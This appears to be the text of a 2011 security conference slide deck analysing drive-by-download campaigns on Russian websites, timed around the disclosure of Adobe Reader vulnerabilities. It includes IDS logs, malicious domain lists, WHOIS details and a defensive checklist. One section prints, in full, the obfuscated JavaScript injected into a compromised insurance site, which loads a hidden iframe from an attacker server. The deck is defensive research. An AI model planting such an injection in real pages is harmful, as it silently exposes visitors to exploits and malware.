vladimir kropotov - drive-by-download attack evolution before and after vulnerabilities’...

Drive-By-Download Attack Evolution Before and After Vulnerability

Disclosure

Vladimir B. Kropotov TBINFORM (TNK-BP Group)

Drive-By-Download

• Hackers distribute malware by "poisoning" legitimate websites

• Hacker injects malicious iframes into HTML content

• Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used by attacker

You just want information

about insurance, nothing

more, but…

What does it look like?

PC connected to

the Internet

Intermediate server

controlled by attacker

Known server with

iframe

Malware

Host ready

Exploit

Exploit server

controlled by attacker

Malware server

controlled by attacker

OS, browser

plugins, etc. INFO

How we find it? Date/Time 2011-08-05 10:44:53 YEKST

Tag Name PDF_XFA_Script

Observance Type Intrusion Detection

Cleared Flag false

Target IP Address 10.X.X.X

Target Object Name 9090

Target Object Type Target Port

Target Service unknown

Source IP Address 10.X.X.Y

SourcePort Name 2359

:compressed zlib

:server total.logeater.org

:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf

How we find it? Date/Time 2011-08-05 10:44:53

Tag Name PDF_XFA_Script

Target IP Address 10.X.X.X

Target Object Name 9090

Target Object Type Target Port

Source IP Address 10.X.X.Y

SourcePort Name 2359

:compressed zlib

:server total.logeater.org

:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf

DOES USER NEED IT??

First indicators Date/Time 2011-07-26 11:24:37

Tag Name PDF_XFA_Script

arg 3592ba48df0fae9e5f5c5b09535a

070d0b04020600510f0c56075c0

6040750

compressed zlib

server mamjhvbw.dyndns.pro

URL /ghqlv3ym/

First indicators

Date/Time 2011-08-18 19:00:13

Tag Name ActiveX_Warning

clsid CAFEEFAC-DEC7-0000-0000-

ABCDEFFEDCBA

server e1in.in

URL /stat/574a353789f/pda.js

Date/Time 2011-08-16 13:24:44

Tag Name ActiveX_Warning

:clsid CAFEEFAC-DEC7-0000-0000-

ABCDEFFEDCBA

server skipetar.in

URL /jb/pda.js

First indicators

Date/Time 2011-08-18 19:00:13

Tag Name PDF_XFA_Script

arg host=http://e1in.in/stat&u=root

compressed zlib

server e1in.in

URL /stat/574a353789f/lastrger.php

Date/Time 2011-08-09 10:17:14

Tag Name PDF_XFA_Script

arg host=http://inaptly.in&b=486def4

compressed gzip

server inaptly.in

URL /jb/lastrger.php

Date/Time 2011-08-14 14:06:28

Tag Name PDF_XFA_Script

:arg host=http://oligist.in&b=486def4

:compressed gzip

:server oligist.in

:URL /jb/lastrger.php

First indicators Date/Time 2011-07-26 11:24:37

Tag Name PDF_XFA_Script

arg 3592ba48df0fae9e5f5c5b09535a

070d0b04020600510f0c56075c0

6040750

compressed zlib

server mamjhvbw.dyndns.pro

URL /ghqlv3ym/

Date/Time 2011-08-18 19:00:13

Tag Name PDF_XFA_Script

arg host=http://e1in.in/stat&u=root

compressed zlib

server e1in.in

URL /stat/574a353789f/lastrger.php

Date/Time 2011-08-18 19:00:13

Tag Name ActiveX_Warning

clsid CAFEEFAC-DEC7-0000-0000-

ABCDEFFEDCBA

server e1in.in

URL /stat/574a353789f/pda.js

Date/Time 2011-08-09 10:17:14

Tag Name PDF_XFA_Script

arg host=http://inaptly.in&b=486def4

compressed gzip

server inaptly.in

URL /jb/lastrger.php

Date/Time 2011-08-14 14:06:28

Tag Name PDF_XFA_Script

:arg host=http://oligist.in&b=486def4

:compressed gzip

:server oligist.in

:URL /jb/lastrger.php

Date/Time 2011-08-16 13:24:44

Tag Name ActiveX_Warning

:clsid CAFEEFAC-DEC7-0000-0000-

ABCDEFFEDCBA

server skipetar.in

URL /jb/pda.js

Example: o-strahovanie.ru

Example: o-strahovanie.ru

Example: o-strahovanie.ru SEP 02 / ============ bbb

============document.xmlSettings.if_ik=false;if(window.localStorage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time(); else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) }); document.xmlSettings.iframe=document.createElement('iframe'); document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;'; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}

Cookie:

if_ik1315314771

www.o-strahovanie.ru/

16004293056256333102392

93001403230174358*

Example: o-strahovanie.ru / ============ bbb ============

else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){

document.xmlSettings.iframe=

document.createElement('iframe'); document.xmlSettings.iframe.style.cssText=

'height:1px;position:absolute;width:1px;border:none;left:-5000px;';

document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.

iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}

Cookie: if_ik1315314771

www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*

Example: o-strahovanie.ru else{// 4 osel …

document.body.appendChild(document.xmlSettings.iframe);

document.xmlSettings.iframe.src=

'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}

iframe.src=

'http://disregarding.in/xtqd2/08.php'

Drive By Download o-strahovanie.ru Sep 02

PC connected to

the Internet

Intermediate server

disregarding.in

Known server with

iframe

Malware

Host ready

Exploit NO

Exploit

server

NO

Malware

server

OS, browser

plugins, etc. INFO

Drive By Download o-strahovanie.ru Sep 12

PC connected to

the Internet

Intermediate server

disregarding.in

Known server with

iframe

Malware

Host ready

Exploit

Exploit server

chamberwoman.in

janiculum.in

Malware server

chamberwoman.in

janiculum.in

OS, browser

plugins, etc. INFO

Example: o-strahovanie.ru Domain Name:DISREGARDING.IN

Created On:14-Jul-2011 11:09:59 UTC

Registrant Name:Russell Rosario

Registrant Street1:136 Oakdale Avenue

City:Winter Haven

Registrant Country:US

Email:russellsrosario@teleworm.com

Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME

Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN

Created On:12-Sep-2011 08:14 UTC

Registrant Name:Russell Rosario

Example: o-strahovanie.ru Domain Name:DISREGARDING.IN

Created On:14-Jul-2011 11:09:59 UTC

Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN

Created On:12-Sep-2011 08:14 UTC

Registrant Name:Russell Rosario

No Payload, because No Payload Requests?

Are they looking for customers?

Example: o-strahovanie.ru Domain ID:D5165642-AFIN Domain

Name:DISREGARDING.IN

Created On:14-Jul-2011 11:09:59 UTC

Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue

City:Winter Haven

Registrant Country:US

Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME

Russell Rosario

filtrated.in Created On:14-Jul-2011 11:09:56 UTC

raptnesses.in Created On:14-Jul-2011 11:09:56 UTC

tansies.in Created On:14-Jul-2011 11:10:03 UTC

Domain Name:FILTRATED.IN Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web

Services Pvt. Ltd. (R118-AFIN) Registrant ID:TS_16731618

Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue Registrant City:Winter Haven Registrant State/Province:Florida Registrant Postal Code:33830 Registrant Country:US Registrant Phone:+1.8635571308

Email:russellsrosario@teleworm.com

But Sally Doesn't Know…

Attack before public disclosure

• Primary location for malicious sites: .IN

• Physical servers location by IP-Address: Romania

• Responsible person: Russell Rosario

• Domains are new

Domain owner is the same

Domain Name Created On Registrant Name

irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario

comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario

hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario

suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario

ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario

20-Jul-2011 Acrobat Vulnerability vendor notified

Vulnerability reported to vendor VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability

VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability

VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability

VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability

X. DISCLOSURE TIMELINE

-----------------------------

2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers

2011-09-14 - Public disclosure

ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability

-- Disclosure Timeline:

2011-07-20 - Vulnerability reported to vendor

2011-10-26 - Coordinated public release of advisory

ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability

-- Disclosure Timeline:

2011-07-20 - Vulnerability reported to vendor

2011-10-27 - Coordinated public release of advisory

Harvetering machine started Domain Name Created On Registrant Name

microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario

oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario

provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario

vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario

kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario

invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario

alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario

dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario

xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario

alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario

skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario

inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario

allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario

But may be someone knows?

• Spamlists

• AV Vendors

• Safebrowsing

• Securityfocus

Spamlists, Aug 19

AV Vendors, Aug 18

Safebrowsing Aug 20

Securityfocus Sep 07 Sent: Wednesday, September 07, 2011 11:31 PM

Subject: There is a strange get request header in all web

pages of my site? I'm worry about Trojan attack!

Today I found that Kasper Anti Virus has blocked my site

and says to the clients that this site is affected by a Trojan.

I traced my site with Fiddler debugging tool and I found

that every time I send a request

to the site a GET request handler is established

to the following URL:

"http://carlos.c0m.li/iframe.php?id=v4pfa2

4nw91yhoszkdmoh413ywv6cp7"

PDF vulnerabilities public disclosure Sep 14. What to expect?

PDF vulnerabilities public disclosure Sep 14. What to expect?

NO GOOD NEWS,

JUST EPIC FAIL

for site administrators

No good news. Hundreds of domains were registered

ITALIA-NEW.IN

BANER-KLERK.RU

BANK-KLERK.RU

BANNER-KLERK.RU

BLOGS-KLERK.RU

BUH-KLERK.RU

DAILY-KP.RU

FORUM-KLERK.RU

I-OBOZREVATEL.RU

INTERFAX-REGION.RU

JOB-KLERK.RU

KLERK-BANK.RU

KLERK-BANKIR.RU

KLERK-BIZ.RU

KLERK-BOSS.RU

KLERK-BUH.RU

KLERK-EVEN.RU

KLERK-EVENTS.RU

KLERK-LAW.RU

KLERK-NEW.RU

KLERK-NEWS.RU

KLERK-REKLAMA.RU

KLERK-RU.RU

KLERK-WORK.RU

KLERK2.RU

OBOZREVATEL-RU.RU

OBOZREVATELRU.RU

WIKI-KLERK.RU

PRESS-RZD.RU

RZD-RZD.RU

IPGEOBASE.IN

* * *

“New generation”

PC connected to

the Internet

Intermediate server

controlled by attacker

Known server with

iframe

Malware

Host ready

Exploit

Exploit server

controlled by attacker

Malware server

controlled by attacker

OS, browser

plugins, etc. INFO

Other known server

NOT controlled by attacker

Attack after public disclosure • Primary location for malicious sites:

.IN, .RU, .CX.CC, .BIZ, .INFO,…

• Physical servers location by IP-Address: International

• Domains registered to different spurious persons

• Domain lifetime ~ time to Blacklists appearance

• Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique)

• If you don't know exact malware URL, site redirects to well known server

• Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed

Known sites examples: RZD.RU Russian rail roads

Known sites examples: RZD.RU

Known sites examples: RZD.RU Russian rail roads

Known sites examples: RZD.RU

Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)

Known sites examples: KP.RU

Other examples: EG.RU (newspaper, 263 685 visits per day)

Other examples: svpressa.ru (newspaper 276 720 visits per day)

Malware examples: Banks targeted attack

Malware examples: Banks targeted attack

• Legal

• Faked

Another news,

another phone…

Malware examples: Banks targeted attack

Malware examples

Malware examples

Script examples

Sample analysis (Virus Total)

Sample analysis (Virus Total)

Sample analysis (Virus Total)

Sample analysis (Virus Total)

Sample analysis (Virus Total)

Sample analysis (Virus Total)

What can we do?

• Patch endpoint

• Tighten the Internet filtering (default deny

if possible)

• No Internet surfing with admin rights

• See what’s happening (continuous

monitoring)

• Check if you’re well (regular technical

audits)

• Educate people

Credits

• Sergey V. Soldatov,

TBINFORM (TNK-BP Group)

• Konstantin Y. Kadushkin,

TBINFORM (TNK-BP Group)

• Wayne Huang,

ARMORIZE

THE END

Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group)

vbkropotov@tnk-bp.com

kropotov@ieee.org